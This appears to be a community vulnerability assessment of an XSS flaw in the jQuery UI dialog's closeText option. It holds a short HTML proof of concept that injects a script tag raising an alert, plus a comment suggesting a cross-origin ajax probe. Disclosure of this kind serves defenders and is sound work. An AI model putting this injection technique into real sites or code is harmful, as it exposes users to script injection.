djsubstance (3)

Last Login: March 16, 2021
Assessments
1
Score
3

djsubstance's Latest (1) Contributions

Sort by:
Filter by:
2
Ratings
  • Attacker Value
    Low
  • Exploitability
    High
Common in enterpriseVulnerable in default configurationDifficult to weaponizeRequires user interaction
Technical Analysis

PoC:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>XSS in closeText option of component ui dialog</title>

<script src="https://code.jquery.com/jquery-2.1.4.js"></script>
<script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css">


<script>

$(document).ready(function ()

   {
    $('#dialog').dialog({ closeText: '<script>alert("XSS")<\/script>' });      // This is the attack point where you can inject code

// if the CORS/CSP policy is not configured or setup wrong, try an jQuery vuln using $.ajax(’https://www.msn.com/robots.txt’);
// if it says onready:1 expand it you should see msn.com’s robots file
// this is a doublewammy of vulnerability in the target

   }
                );
</script>

</head>
<body>

<div id="dialog" title="Dialog Title">Content here!</div>

</body>
</html>

Positives: Easy, can potentially execute scripts off remote sites
Negatives: Would likely require user intervention social engineer or phishing to make this persistant or of real use

Document on how the dialog function is used in jQuery – https://www.tutorialspoint.com/jqueryui/jqueryui_dialog.htm

Here is a link to a site that will prove which jquery exploits are vuln. to which version (specific to jQuery not UI) – https://research.insecurelabs.org/jquery/test/
More info on exploit and poc: https://vuldb.com/?id.98137

dj substance
https://tranceattic.com